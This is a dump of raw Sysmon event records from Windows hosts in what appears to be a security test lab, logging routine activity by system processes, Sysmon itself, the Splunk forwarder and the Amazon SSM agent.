10:42:47.377{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215241Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.377{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0FA7-6216-2104-000000003902}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215240Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.377{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FA7-6216-2104-000000003902}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215239Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.378{4F8D34B0-0FA7-6216-2104-000000003902}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000215238Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:45.240{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51245-false10.0.1.12-8089- 23542300x8000000000000000215237Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:47.083{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-127MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:48.164{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=720B6664B552FC82C4D5810345EF3C8A,SHA256=F25C278C4171F3BAEC164C81F26B5FAE99E1FE0E8CA9A12A483F572CF19FA589,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215267Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:48.444{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E80F6B66B9F1C037D759BE440DF5ADE,SHA256=30F72A6C58E0F5BDCED6F62E27CDB4D5F5A68FE7BF46EFCC07302FBFCF0AA412,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215295Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FA9-6216-2404-000000003902}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215294Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215293Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215292Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215291Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215290Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215289Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215288Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215287Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215286Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215285Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-0FA9-6216-2404-000000003902}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215284Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.835{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0FA9-6216-2404-000000003902}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215283Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.836{4F8D34B0-0FA9-6216-2404-000000003902}4016C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000215282Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.616{4F8D34B0-0FA9-6216-2304-000000003902}26242860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215281Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0FA9-6216-2304-000000003902}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215280Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215279Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215278Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0FA9-6216-2304-000000003902}2624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215277Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215276Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215275Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:49.335{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215274Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 